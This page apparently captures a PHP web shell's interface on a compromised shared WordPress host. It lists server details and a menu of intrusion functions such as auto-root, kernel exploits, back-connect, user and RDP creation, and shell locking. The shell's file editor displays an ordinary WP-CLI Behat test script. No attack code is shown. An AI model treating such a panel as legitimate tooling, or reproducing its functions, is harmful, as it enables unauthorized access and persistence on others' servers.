Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
wp-cli-tests /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
install-package-tests
5.08
KB
-rwxr-xr-x
rerun-behat-tests
674
B
-rwxr-xr-x
run-behat-tests
1.52
KB
-rwxr-xr-x
run-linter-tests
75
B
-rwxr-xr-x
run-php-unit-tests
797
B
-rwxr-xr-x
run-phpcbf-cleanup
207
B
-rwxr-xr-x
run-phpcs-tests
206
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run-behat-tests
#!/bin/bash # Run the Behat tests only if a Behat config file is found. if [ ! -f "behat.yml" ]; then echo 'Did not detect "behat.yml" file, skipping Behat tests.' exit 0; fi if ! command -v jq &> /dev/null then echo 'The required "jq" command was not found, please install it to run the Behat tests.' echo "See https://stedolan.github.io/jq/download/ for installation instructions." exit 1; fi if [[ "$@" == *"--help"* ]]; then vendor/bin/behat "$@" ret=$? exit $ret fi # Turn WP_VERSION into an actual number to make sure our tags work correctly. if [ "${WP_VERSION-latest}" = "latest" ]; then export WP_VERSION=$(curl -s https://api.wordpress.org/core/version-check/1.7/ | jq -r ".offers[0].current") fi # To retrieve the WP-CLI tests package root folder, we start with this scripts # location. SOURCE="${BASH_SOURCE[0]}" # Resolve $SOURCE until the file is no longer a symlink. while [ -h "$SOURCE" ]; do DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )" SOURCE="$(readlink "$SOURCE")" # If $SOURCE was a relative symlink, we need to resolve it relative to the # path where the symlink file was located. [[ $SOURCE != /* ]] && SOURCE="$DIR/$SOURCE" done # Fetch the root folder of the WP-CLI tests package. WP_CLI_TESTS_ROOT="$( cd -P "$( dirname "$SOURCE" )/.." && pwd )" export WP_CLI_TESTS_ROOT # Generate the tags to apply environment-specific filters. BEHAT_TAGS=$(php "$WP_CLI_TESTS_ROOT"/utils/behat-tags.php) # Run the functional tests. vendor/bin/behat --format progress "$BEHAT_TAGS" --strict "$@"
Close